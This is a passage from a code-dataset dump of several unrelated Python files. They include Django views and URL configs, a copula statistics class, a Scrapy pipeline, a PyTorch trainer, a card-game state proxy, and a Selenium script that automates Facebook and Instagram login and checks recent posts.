ItemType.objects.get(id=data['itemType'])\n\n item.name = data['itemName']\n item.save()\n\n del data['itemPK']\n del data['itemType']\n del data['itemName']\n\n for k, v in data.iteritems():\n # If an item was created without a value for a specific field, that value\n # will not show up in itemAttributeValue. This will cause an DoesNotExist\n # error. 
Now it will create that itemAttributeValue if it does not exist.\n try:\n attribute = ItemAttributeValue.objects.get(item=item.pk, attribute=k)\n attribute.value = v\n attribute.save()\n except:\n attribute = Attribute.objects.get(id=k)\n self._create_item_attr_value(item, attribute, v)\n\n @classmethod\n def get_item_values(self, itemID):\n #returns a dict of field values for an item\n item = Item.objects.get(id=itemID)\n fields = {}\n objs = ItemAttributeValue.objects.all().filter(item=item)\n\n for obj in objs:\n fields.update({obj.attribute.label: obj.value})\n\n return {'item': item.name, 'fields': fields, 'itemType': item.itemType.name}\n\n @classmethod\n def get_all_items(self):\n #Returns all items in the db.\n returnItems = []\n for item in Item.objects.all():\n returnItems.append({'itemID': item.id,\n 'itemName': item.name,\n 'itemType': item.itemType.name})\n\n return {'items': returnItems}\n\n @classmethod\n def get_all_items_for_type(self, itemTypePK):\n #Return all items of a specified item type, except if it is archived.\n returnItems = []\n itemType = ItemType.objects.get(pk=itemTypePK)\n\n for item in Item.objects.all().filter(itemType=itemType):\n if not item.archived:\n returnItems.append({'itemID': item.id,\n 'itemName': item.dataType})\n\n return {'items': returnItems}\n\nclass HandleItemTypes(Items):\n\n def __init__(self, data):\n self.errors = []\n self.data = data\n\n def _validate_attributes(self, data):\n #validate attributes when new ones are created.\n #Code needs revision. Crude, but works. Can be better. :'(\n errors = {}\n for attr in data:\n index = 0\n attr_errors = {}\n label= ''\n dataType= ''\n required= ''\n default= ''\n for k, v in attr.iteritems():\n if k == 'index':\n index = v\n elif k == 'label':\n label = v\n elif k == 'dataType':\n dataType = v\n elif k == 'required':\n required = v\n elif k == 'default':\n default = v\n\n if not label:\n attr_errors['label'] = 'No label given.'\n\n #dataType = True\n if not dataType:\n attr_errors['dataType'] = 'No dataType given.'\n #dataType = False\n elif dataType not in ['str', 'int', 'dat', 'tim']:\n attr_errors['dataType'] = 'dataType not allowed.'\n #dataType = False\n\n if not default:\n attr['default'] = ''\n else:\n if dataType:\n error = self._is_valid_data(dataType, default)\n if error:\n attr_errors['default'] = error\n\n ## Requried is nie 'n required field nie?\n # if not required:\n # attr_errors['required'] = 'No required given.'\n\n if attr_errors:\n errors[index] = attr_errors\n\n return data, errors\n\n def is_valid(self):\n #validate input for dataType and attribute creation.\n\n self.errors = {}\n validated = True\n\n if 'itemType' in self.data:\n try:\n ItemType.objects.get(name=self.data['itemType'])\n self.errors['itemType'] ='itemType already exists.'\n validated = False\n except:\n pass\n else:\n self.errors['itemType'] = 'No itemType given.'\n validated = False\n\n data2, attrErrors = self._validate_attributes(self.data['attributes'])\n self.data['attributes'] = data2\n if attrErrors:\n self.errors['attributes'] = attrErrors\n validated = False\n\n if validated:\n self._create_type_with_attrs(self.data)\n return True\n else:\n return False\n\n #private methods\n def _create_itemType(self, name, description):\n obj = ItemType(name=name, description=description)\n obj.save()\n return obj\n\n def _create_attribute(self, label, dataType, defaultValue, required):\n obj = Attribute(label=label, dataType=dataType, defaultValue=defaultValue, required=required)\n obj.save()\n return obj\n\n 
#public methods\n def _create_type_with_attrs(self, input):\n #creates a new item type and its attributes and links them.\n try:\n itemType = self._create_itemType(input['itemType'], input['itemType'])\n for attr in input['attributes']:\n newAttr = self._create_attribute(attr['label'], attr['dataType'], attr.get('default',None), attr.get('required',False))\n self._create_item_attr_relation(itemType, newAttr)\n return True\n except Exception as e:\n print(e)\n return False\n\n @classmethod\n def get_all_item_types(self):\n #return all item types: {itemTypeID:ItemTypeName}\n result = {}\n for itemType in ItemType.objects.all():\n result[itemType.id] = itemType.name\n return result\n\n @classmethod\n def get_item_type_attrs(self, itemTypePK):\n #expects an itemType name\n #returns a dict with attribute types as follows:\n # {'itemTypeId': 0, 'fields': [{'fieldId': 0, 'dataType': 'str', 'label': 'Name'}]}\n\n fields = []\n #itemType = ItemType.objects.get(pk=itemTypePK)\n itAts = ItemAttribute.objects.all().filter(itemType=itemTypePK)\n\n return itAts","sub_path":"item/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":10527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"577368147","text":"from django.conf.urls import url, patterns\n\nfrom . import views\n\n\nurlpatterns = [\n url(r'^$', views.index, name='case_index'),\n url(r'^module/(?P\\d+\\.\\d+)/$', views.module_show, name='module_show'),\n url(r'^update_settings$', views.update_setting, name='default_set'),\n url(r'^create$', views.create, name='case_create'),\n url(r'^save$', views.save, name='case_save'),\n url(r'^upload$', views.upload, name='case_upload'),\n url(r'^import$', views.process_import, name='import_file'),\n url(r'^update_time', views.update_case_time, name='update_time'),\n url(r'^test$', views.test_model),\n\n\n]\n\n\n\n# print static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"casemanager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"622070356","text":"import sys\n\nfrom crawlers import BaseCrawler\n\n\nclass EbayCrawler(BaseCrawler):\n crawler_name = 'eBay'\n\n def __init__(self, logger, message_bus, ebay_app_settings, crawler_settings):\n super().__init__(logger, crawler_settings)\n\n self._ebay_app_settings = ebay_app_settings\n self._message_bus = message_bus\n\n # Initialize the queue being listened to\n self._message_bus.init_queue(info=self._settings['listener'])\n\n # Subscribes to the message of every iteration of the while-true loop\n self.subscribe('iteration', self.iteration)\n # Subscribes to the message that the limit of processed messages has been exhausted\n self.subscribe('stop_iteration', self.limit)\n\n def iteration(self):\n # Extracts 1 message from the queue on each loop iteration\n output = self._message_bus.get_message(\n info=self._settings['listener']\n )\n\n if not output:\n self._logger.debug('Empty message.')\n\n return output\n\n def limit(self):\n # If the limit has been reached - terminates the application\n self._logger.info('Reached the message processing limit.')\n sys.exit(1)\n","sub_path":"application/crawlers/ebay/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"198926439","text":"from typing import Optional, Union\n\nimport numpy as np\nimport pandas as 
pd\nfrom scipy.stats import beta\n\nfrom copulae.copula import BaseCopula\nfrom copulae.copula import Summary\nfrom copulae.core import rank_data\nfrom copulae.special import log_sum\nfrom copulae.types import Array, EPSILON, Ties\nfrom copulae.utility.array import array_io_mcd\nfrom .distribution import emp_dist_func\n\ntry:\n from typing import Literal\nexcept ImportError:\n from typing_extensions import Literal\n\nSmoothing = Literal['none', 'beta', 'checkerboard']\n\n\nclass EmpiricalCopula(BaseCopula[None]):\n \"\"\"\n Given pseudo-observations from a distribution with continuous margins and copula, the empirical copula is\n the (default) empirical distribution function of these pseudo-observations. It is thus a natural nonparametric\n estimator of the copula.\n\n Examples\n --------\n >>> from copulae import EmpiricalCopula\n >>> from copulae.datasets import load_marginal_data\n >>> df = load_marginal_data()\n >>> df.head(3)\n STUDENT NORM EXP\n 0 -0.485878 2.646041 0.393322\n 1 -1.088878 2.906977 0.253731\n 2 -0.462133 3.166951 0.480696\n >>> emp_cop = EmpiricalCopula(3, df, smoothing=\"beta\")\n >>> data = emp_cop.data # getting the pseudo-observation data (this is the converted df)\n >>> data[:3]\n array([[0.32522493, 0.1886038 , 0.55781406],\n [0.15161613, 0.39953349, 0.40953016],\n [0.33622126, 0.65611463, 0.62645785]])\n # must feed pseudo-observations into cdf\n >>> emp_cop.cdf(data[:2])\n array([0.06865595, 0.06320104])\n >>> emp_cop.pdf([[0.5, 0.5, 0.5]])\n 0.009268568506099015\n >>> emp_cop.random(3, seed=10)\n array([[0.59046984, 0.98467178, 0.16494502],\n [0.31989337, 0.28090636, 0.09063645],\n [0.60379873, 0.61779407, 0.54215262]])\n \"\"\"\n\n def __init__(self, dim: Optional[int] = None, data: Optional[Union[np.ndarray, pd.DataFrame]] = None,\n smoothing: Optional[Smoothing] = None, ties: Ties = \"average\", offset: float = 0):\n \"\"\"\n Creates an empirical copula\n\n Parameters\n ----------\n dim\n Dimension of the copula. If this is not provided, it will be derived from the dimension of the data set\n\n data\n The data set for the empirical copula. The data set dimension must match the copula's dimension. If\n dim is not set, the dimension of the copula will be derived from the data's dimension. Data must be\n a matrix\n\n smoothing\n If not specified (default), the empirical distribution function or copula is computed. If \"beta\", the\n empirical beta copula is computed. If \"checkerboard\", the empirical checkerboard copula is computed.\n\n ties\n The method used to assign ranks to tied elements. The options are 'average', 'min', 'max', 'dense'\n and 'ordinal'.\n 'average': The average of the ranks that would have been assigned to all the tied values is assigned\n to each value.\n 'min': The minimum of the ranks that would have been assigned to all the tied values is assigned to\n each value. (This is also referred to as \"competition\" ranking.)\n 'max': The maximum of the ranks that would have been assigned to all the tied values is assigned to\n each value.\n 'dense': Like 'min', but the rank of the next highest element is assigned the rank immediately after\n those assigned to the tied elements. 'ordinal': All values are given a distinct rank, corresponding\n to the order that the values occur in `a`.\n\n offset\n Used in scaling the result for the density and distribution functions. 
Defaults to 0.\n \"\"\"\n self.ties = ties\n self._offset = offset\n self._name = \"Empirical\"\n self.smoothing = smoothing\n\n assert dim is not None or data is not None, \"Either dimension or data must be specified\"\n self._dim = data.shape[1] if dim is None else int(dim)\n assert self.dim > 1, \"Dimension must be >= 2\"\n\n self.data = data\n self.init_validate()\n\n @array_io_mcd\n def cdf(self, u: Array, log=False) -> np.ndarray:\n if np.any(u > (1 + EPSILON)) or np.any(u < -EPSILON):\n raise ValueError(\"input array must be pseudo observations\")\n cdf = emp_dist_func(u, self.data, self._smoothing, self._offset)\n return np.log(cdf) if log else cdf\n\n @property\n def data(self):\n \"\"\"\n The empirical data source from which to compare against. Note that when setting the data, it will\n be automatically transformed to pseudo-observations by default based on the\n :meth:`~EmpiricalCopula.ties` property\n \"\"\"\n if self._data is None:\n self._data = self.pobs(self._source, self.ties)\n return self._data\n\n @data.setter\n def data(self, data: Union[pd.DataFrame, np.ndarray]):\n data = np.asarray(data)\n assert data.ndim == 2, \"data must be 2 dimensional\"\n assert self.dim == data.shape[1], \"data and copula dimensions do not match\"\n self._source = data\n self._data = None\n\n @property\n def params(self):\n \"\"\"\n By default, the Empirical copula has no \"parameters\" as everything is defined by the input data\n \"\"\"\n return None\n\n @array_io_mcd\n def pdf(self, u: Array, log=False):\n assert self.smoothing == \"beta\", \"Empirical Copula only has density (PDF) for 'beta' smoothing\"\n assert isinstance(self.data, np.ndarray), \"data is still undefined for EmpiricalCopula\"\n u = self.pobs(u, self.ties)\n\n data_rank = rank_data(self.data, 1, self.ties)\n n = len(self.data)\n\n if log:\n return np.array([\n log_sum(\n np.array([\n sum(beta.logpdf(row, a=row_rank, b=n + 1 - row_rank))\n for row_rank in data_rank\n ])\n ) for row in u]) - np.log(n + self._offset)\n else:\n return np.array([\n sum([\n np.prod(beta.pdf(row, a=row_rank, b=n + 1 - row_rank))\n for row_rank in data_rank\n ]) for row in u]) / (n + self._offset)\n\n def random(self, n: int, seed: int = None):\n assert isinstance(self.data, np.ndarray), \"data is still undefined for EmpiricalCopula\"\n assert n <= len(self.data), \"random samples desired must not exceed number of rows in data\"\n\n if seed is not None:\n np.random.seed(seed)\n\n return self.data[np.random.randint(0, len(self.data), n)]\n\n @property\n def smoothing(self):\n \"\"\"\n The smoothing parameter. \"none\" provides no smoothing. \"beta\" and \"checkerboard\" provide a smoothed\n version of the empirical copula. See equations (2.1) - (4.1) in Segers, Sibuya and Tsukahara\n\n References\n ----------\n `The Empirical Beta Copula `\n \"\"\"\n return self._smoothing\n\n @smoothing.setter\n def smoothing(self, smoothing: Optional[Smoothing]):\n if smoothing is None:\n smoothing: Smoothing = \"none\"\n\n assert smoothing in (\"none\", \"beta\", \"checkerboard\"), \"Smoothing must be 'none', 'beta' or 'checkerboard'\"\n self._smoothing = smoothing\n\n def summary(self):\n return Summary(self, {\n \"Dimensions\": self.dim,\n \"Ties method\": self.ties,\n \"Offset\": self._offset,\n \"Smoothing\": self._smoothing,\n })\n\n @property\n def ties(self):\n \"\"\"\n The method used to assign ranks to tied elements. 
The options are 'average', 'min', 'max', 'dense'\n and 'ordinal'.\n\n 'average':\n The average of the ranks that would have been assigned to all the tied values is assigned\n to each value.\n 'min':\n The minimum of the ranks that would have been assigned to all the tied values is assigned to\n each value. (This is also referred to as \"competition\" ranking.)\n 'max':\n The maximum of the ranks that would have been assigned to all the tied values is assigned to\n each value.\n 'dense':\n Like 'min', but the rank of the next highest element is assigned the rank immediately after\n those assigned to the tied elements. 'ordinal': All values are given a distinct rank, corresponding\n to the order that the values occur in `a`.\n \"\"\"\n return self._ties\n\n @ties.setter\n def ties(self, value: Ties):\n if getattr(self, \"_ties\", \"\") != value:\n self._ties = value\n self._data = None\n","sub_path":"copulae/empirical/empirical.py","file_name":"empirical.py","file_ext":"py","file_size_in_byte":8841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"191995037","text":"from django.urls import include, path\n\nfrom .views import FollowAPIView, ListFollowView, UserView\n\nurlpatterns = [\n path('auth/', include('djoser.urls')),\n path('auth/', include('djoser.urls.authtoken')),\n path('users//subscribe/', FollowAPIView.as_view(),\n name='subscribe'),\n path('users/subscriptions/', ListFollowView.as_view(),\n name='subscriptions'),\n path('users/me/', UserView.as_view(), name='me'),\n path('', include('djoser.urls')),\n]\n","sub_path":"backend/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"79464868","text":"#####################################################################\n# Python script to compute and plot the reflection coefficients.\n#\n# Run:\n# python3 RealRefIce.py ICEBERG1/\n#\n# The initial frequency space: omega\n# Interpolated onto a finer space omeganew with endpoints of omega\n# Compute the modal coefficients and plot\n# Compute the reflection and transmission coefficient and plot\n# Compute the energy conservation result.\n######################################################################\n\nimport numpy as np\nfrom modules.interpolateFreq import *\nimport matplotlib.pyplot as plt\nimport sys\nimport time\n\nfilePath=sys.argv[1];\n\npi=np.pi\nomega=2*pi*np.linspace(0.01,0.125,51)\nT=2*pi/omega\nRC=np.zeros((51,4),dtype=complex)\n\nnpts=399\nnev=10\nomeganew=interpolateCoeffsFreq(2*pi*0.01,2*pi*0.125,omega,nev,filePath+\"2_ModesMatrix/\",npts,1)\nLAM=buildLam(filePath)\n\nplt.figure(figsize=[10,4])\nplt.title(\"Modal Amplitudes\")\nfor m in np.arange(3,6):\n L=LAM[:,m]\n plt.plot(omeganew/(2*pi),abs(L),linewidth=2,label=\"$|\\lambda_\"+str(m+1)+\"|$\")\nplt.legend()\nplt.xlabel('$\\omega/(2\\pi)$')\nplt.ylim([0,5])\n\n## Interpolating reflection coefficients\nNModes = 3\nV=interpolateRefCoeff(omega,omeganew,nev,filePath+\"2_RefCoeff/\",NModes,\"C\")\nRC=buildRMat(LAM,filePath,\"C\",0)\nplt.figure(figsize=[10,4])\nplt.plot(omeganew/(2*pi),np.transpose(abs(RC)),linewidth=2,label=\"R($\\omega$)\")\n\n## Interpolating Transmission coefficients\nV=interpolateRefCoeff(omega,omeganew,nev,filePath+\"2_RefCoeff/\",NModes,\"T\")\nRT=buildRMat(LAM,filePath,\"T\",0)\nplt.plot(omeganew/(2*pi),np.transpose(abs(RT)),linewidth=2,label=\"T($\\omega$)\")\n\n# Check Energy 
Conservation\nplt.plot(omeganew/(2*pi),np.transpose(abs(RT)**2+abs(RC)**2),linewidth=2,label=\"$1.0$\")\n\nplt.title(\"$T(\\omega)$ and $R(\\omega)$\")\nplt.legend()\nplt.xlabel('$\\omega/(2\\pi)$')\nplt.ylim([0,1.1])\n\nplt.show()\n","sub_path":"python_modules/RealRefIce.py","file_name":"RealRefIce.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"495164590","text":"\"\"\"\nAUTHOR: zeng_xiao_yu\nGITHUB: https://github.com/zengxiaolou\nEMAIL: zengevent@gmail.com\nTIME: 2020/5/11-16:12\n\"\"\"\n\ndef func1():\n yield 1\n yield from func2()\n yield 2\n\ndef func2():\n yield 3\n yield 4\n\nf1 = func1()\nfor item in f1:\n print(item)","sub_path":"coroutines/yield_test.py","file_name":"yield_test.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"305863003","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\nimport codecs\nclass AutoprojectPipeline(object):\n def __init__(self):\n self.file=codecs.open(\"goods.json\",'w',encoding='utf-8')\n def process_item(self,item,spider):\n for j in range(len(item['商品名称'])):\n name=item['商品名称'][j]\n price=item['商品价格'][j]\n link1=item['商品链接'][j]\n link2=item['店铺链接'][j]\n comments=item['商品评论数'][j]\n goods={\"商品名称\":name,\"商品价格\":price,'商品链接':link1,'店铺链接':link2,'商品评论数':comments}\n line=json.dumps(dict(goods),ensure_ascii=False)+'\\n'\n self.file.write(line)\n return item\n def spider_closed(self,spider):\n self.file.close()\n","sub_path":"pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"17835400","text":"import os\nimport time\nimport torch\nfrom metric import compute_drmsd_over_batch\n\n\nclass Trainer():\n def __init__(self, model, train_loader, val_loader, config):\n\n self.cfg = config['train']\n self.NUM_DIHEDRALS = config['model']['num_dihedrals']\n self.model = model\n self.dataloader = {'train': train_loader,\n 'val': val_loader}\n\n self._cuda()\n\n self._start_epoch = 0\n self._global_step = 0\n\n self.optimizer = torch.optim.Adam(self.model.parameters())\n\n def _cuda(self):\n self.device = 'cuda' if torch.cuda.is_available() else 'cpu'\n self.model.to(self.device)\n\n def _net_mode(self, is_train):\n if is_train:\n self.model.train()\n else:\n self.model.eval()\n\n def loss_fn(self, x, y, m, s):\n if self.cfg['atoms'] == 'c_alpha':\n x = x[1::self.NUM_DIHEDRALS]\n y = y[1::self.NUM_DIHEDRALS]\n return compute_drmsd_over_batch(x, y, m, s)\n\n def train(self):\n for epoch in range(self._start_epoch, self.cfg['epochs']):\n self._net_mode(is_train=True)\n epoch_loss = 0\n start = time.time()\n for step, inputs in enumerate(self.dataloader['train']):\n # check empty data stream when all samples exceed max_len\n if inputs is None:\n continue\n\n prim, evol, tert, mask, slen = [x.to(self.device) for x in inputs]\n coord = self.model([prim, evol, slen])\n loss, loss_sum = self.loss_fn(coord, tert, mask, slen)\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n epoch_loss += loss_sum.data\n\n self._global_step += 1\n\n avg_loss = epoch_loss / len(self.dataloader['train'].dataset)\n print(\"Epoch: {} | Avg drmsd: {:.3f} | Time: 
{:.2f}\".format(epoch + 1,\n avg_loss,\n time.time() - start))\n\n if (epoch + 1) % self.cfg['save_step'] == 0:\n self.save(epoch)\n\n if (epoch + 1) % self.cfg['eval_step'] == 0:\n self.evaluate()\n\n def evaluate(self, dl=None):\n if dl is None:\n dl = self.dataloader['val']\n\n self._net_mode(is_train=False)\n eval_loss = 0\n start = time.time()\n for step, inputs in enumerate(dl):\n if inputs is None:\n continue\n prim, evol, tert, mask, slen = [x.to(self.device) for x in inputs]\n coord = self.model([prim, evol, slen])\n loss, loss_sum = self.loss_fn(coord, tert, mask, slen)\n eval_loss += loss_sum.data\n\n avg_loss = eval_loss / len(dl.dataset)\n print(\"Evaluate loss: {:.3f} | Time: {:.2f}\".format(avg_loss, time.time() - start))\n\n\n def save(self, epoch):\n path = os.path.join(self.cfg['save_path'], \"epoch_{}\".format(epoch))\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': self.model.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict()\n }, path)\n\n def load(self, fname):\n ckpt = torch.load(fname)\n self.model.load_state_dict(ckpt['model_state_dict'])\n self.optimizer.load_state_dict(ckpt['optimizer_state_dict'])\n self._start_epoch = ckpt['epoch']\n\n\n\nclass Logger():\n def __init__(self, log_dir):\n self.writer = torch.utils.tensorboard.SummaryWriter()\n\n def scalar_summary(self, tag, value, step):\n pass\n\n def image_summary(self,):\n pass\n\n def hist_summary(self,):\n pass\n\n\n","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"477034220","text":"import json\n\nfrom card_broker.models.player_state import PlayerState\nfrom card_broker.shared.db import get_new_db_session\nfrom card_broker.shared.card_operations.deck_helpers import shuffle_deck\n\nclass PlayerStateProxy():\n \"\"\"\n proxy object for manipulating and retrieving data from GameState objects\n \"\"\"\n\n def __init__(self, player_id):\n session = get_new_db_session()\n player_state = (\n session.query(PlayerState).filter(PlayerState.player_id == player_id).first()\n )\n\n self.id = player_state.id\n self.player_id = player_id\n self.card_state = json.loads(player_state.card_state)['card_state']\n session.close()\n\n def get_card_state(self):\n \"\"\"\n returns current game state\n \"\"\"\n return self.card_state\n\n def acquire_card(self, card_id):\n \"\"\"\n acquire a card, put in player discard\n \"\"\"\n self.card_state['discard'].append(card_id)\n self.update_card_state()\n\n def draw_card(self):\n \"\"\"\n draw card from deck\n \"\"\"\n self.card_state['hand'].append(\n self.card_state['deck'].pop()\n )\n self.update_card_state()\n\n def discard_card(self, hand_slot):\n \"\"\"\n discard card from hand to discard\n \"\"\"\n self.card_state['discard'].insert(\n len(self.card_state['discard']),\n self.card_state['hand'].pop(hand_slot)\n )\n self.update_card_state()\n\n def trash_card(self, hand_slot):\n \"\"\"\n removes card at hand slot from player card context, returns card_id so it can be\n sent to game trash\n \"\"\"\n card_id = self.card_state['hand'].pop(hand_slot)\n self.update_card_state()\n return card_id\n\n def discard_hand(self):\n \"\"\"\n discard entire hand into discard\n \"\"\"\n self.card_state['discard'].extend(self.card_state['hand'])\n self.card_state['hand'] = []\n self.update_card_state()\n\n def update_card_state(self):\n session = get_new_db_session()\n session.query(PlayerState).filter(PlayerState.id == 
self.id).update(\n {'card_state': json.dumps({'card_state':self.card_state})}\n )\n session.commit()\n session.close()\n","sub_path":"card_broker/models/player_state_proxy.py","file_name":"player_state_proxy.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"596276741","text":"# date time format used everywhere, TZ is important so users know that it's localized\nDATETIME_FORMAT = '%Y-%m-%d %H:%M %Z'\n\n# final card state in a sprint\nCOMPLETED_COLUMNS = [\"Complete\", \"Accepted\"]\n\n# columns for sprint cards which indicate active sprint\nSPRINT_CARDS_ACTIVE = [\"In Progress\", \"Next\"]\n\n# columns used to compute sprint commitment\nSPRINT_COMMITMENT_COLUMNS = [\"Next\", \"In Progress\"]\n\n# initial columns we usually care about\nINITIAL_COLUMNS = [\"New\", \"Backlog\", \"Next\", \"In Progress\", \"Complete\"]\n\n# initial is good enough\nCUMULATIVE_FLOW_INITIAL_WORKFLOW = INITIAL_COLUMNS\n\n\n# help messages in UI\n\nBURNDOWN_CHART_DESCRIPTION = \"This chart is...\"\nCONTROL_CHART_DESCRIPTION = \"This chart is...\"\nVELOCITY_CHART_DESCRIPTION = \"This chart is...\"\nCUMULATIVE_FLOW_CHART_DESCRIPTION = \"This chart is...\"\nSPRINT_COMMITMENT_DESCRIPTION = \"Columns which...\"\nDATA_SYNCHRONIZATION_DESCRIPTION = \"Data are synchronized...\"\nSPRINT_CALCULATION_DESCRIPTION = \"Sprints are calculated...\"\nSELECTED_COLUMNS_DESCRIPTION = \"Filter...\"\n","sub_path":"trello_reporter/charting/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"624161004","text":"# -*- coding: utf-8 -*-\nfrom selenium import webdriver\n# import selenium.webdriver.common.action_chains\n# from selenium import common\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\nimport os\nimport urllib.request\nimport Conf_features\nimport hashtag_creator\n\n\n\nmobile_emulation = { \"deviceName\": \"iPhone 6\" }\n#img_link=''\nname_of_article=''\ntext_of_article=''\nhashtag_category=''\narticle_number=0\narticle_link=''\nsuccessful_post=False\nattempt=0\nusername=Conf_features.fb_mail\npsw=Conf_features.fb_password\n#probably_posted=False\n#counter_of_posts=0\n\n\n\ndef define_variables(name,text,hashtag,number,link):\n global name_of_article\n global text_of_article\n global hashtag_category\n global article_number\n global article_link\n name_of_article = name\n text_of_article = text\n hashtag_category = hashtag\n article_number = number\n article_link = link\n\n\n# def put_img_to_folder(image_link,number,name,high_text):\n# print(image_link)\n# urllib.request.urlretrieve(image_link,'autocon_images/'+'img_of_article'+str(number)+'.jpg')\n# Image_formalization.Image_change('autocon_images/'+'img_of_article'+str(number)+'.jpg',name,high_text)\n\n\n\ndef enter_to_instagram(driver):\n global probably_posted\n page_link = \"https://www.facebook.com/TESTpage-2226833254218260/?modal=admin_todo_tour\"\n enter_facebook_link=''\n\n #global counter_of_posts\n global successful_post\n #d=[]\n try:\n\n print(\"parse\"+article_link)\n # driver.get('http://'+article_link)\n # time.sleep(4)\n # WebDriverWait(driver, 15).until(EC.visibility_of_all_elements_located)\n # description = driver.find_element_by_xpath(\"//body / div / div[6] / div / div[1] / div[3] / div / 
p[1]\").text\n # print(description)\n # d=driver.find_element_by_xpath(\"//body / div / div[6] / div / div[1] / div[3] / div / p[2]\").text\n #\n # print(\"getted\")\n # #print(str(d))\n # print(len(d))\n # time_of_reading=len(d)//700+1\n # for m in re.finditer(\"\\n\",d):\n # if m.start()>=1000:\n # d=d[:m.start()]\n # print(len(d))\n # break\n # print(len(d))\n\n\n\n except Exception as msg:\n print(msg)\n\n driver.get(page_link)\n time.sleep(6)\n driver.find_element_by_xpath('//form/div/div/div/input[@aria-label=\"Email or Phone\"]').send_keys(username)\n\n driver.find_element_by_xpath('//form/div/div/div/input[@aria-label=\"Password\"]').send_keys(psw)\n driver.find_element_by_xpath('//*[@id=\"loginbutton\"]').click()\n time.sleep(60)\n # driver.implicitly_wait(10)\n #time.sleep(1)\n #WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH,\"//*[text()='Log in']\")))\n #try:\n # WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//main/article/div/div/div/button\")))\n # button_login = driver.find_element_by_xpath(\"//*[text()='Log in']\")\n # button_login.click()\n #WebDriverWait(driver, 10).until(EC.)\n\n #user_mail = driver.find_element_by_xpath(\"//*[@class='login-button__user']\")\n #assert user_mail.text == \"au\"\n # except selenium.common.exceptions.NoSuchElementException:\n # link_entry = driver.find_element_by_link_text(\"/accounts/login/?source=auth_switcher\")\n # link_entry.click()\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//*[text()='Phone number, username, or email']\")))\n login_field = driver.find_element_by_name(\"username\")\n login_field.send_keys(username)\n WebDriverWait(driver, 10).until(\n EC.element_to_be_clickable((By.XPATH, \"//*[text()='Password']\")))\n password_field = driver.find_element_by_name(\"password\")\n password_field.send_keys(psw)\n # button_entry = driver.find_element_by_xpath(\"//*[text()='Войти']\")\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//*[text()='Log in']\")))\n time.sleep(1)\n entry_form = driver.find_element_by_xpath(\"//form[@method='post']\")\n entry_form.submit()\n #button_entry = driver.find_element_by_xpath(\"//*[text()='Log in']\")\n #button_entry.click()\n print(\"Log in\")\n #time.sleep(5)\n #driver.implicitly_wait(10)\n #WebDriverWait(driver,10).until(EC.visibility_of_all_elements_located)\n try:\n WebDriverWait(driver, 10).until(EC.element_to_be_clickable((By.XPATH, \"//*[text()='Not Now']\")))\n #driver.implicitly_wait(10)\n button_not_now = driver.find_element_by_xpath(\"//*[text()='Not Now']\")\n button_not_now.click()\n print(\"Not now\")\n except Exception as msg:\n print(msg)\n pass\n # driver.get(\"https://www.instagram.com/\" + username)\n # WebDriverWait(driver, 20).until(EC.element_to_be_clickable((By.XPATH, \"//span[@aria-label='Profile']\")))\n driver.get(\"https://www.instagram.com/\"+username)\n #time.sleep(1)\n WebDriverWait(driver, 10).until(EC.visibility_of_all_elements_located)\n # amount_of_posts = int(driver.find_element_by_xpath(\"//ul/li/span/span\").text)\n # print(amount_of_posts)\n post=[]\n for j in range(9):\n xpath_str=\"// section / main / div / div[3] / article / div[1] / div / div[{0}] / div[{1}] / a / div / div[1] / img\".format(str((j)//3+1),str((j)%3+1))\n post.append(driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\"))#[:driver.find_element_by_xpath(xpath_str).get_attribute(\"alt\").find(\"\\n\")])\n print(post[j])\n if post[j].find(description)!=-1: successful_post=True\n 
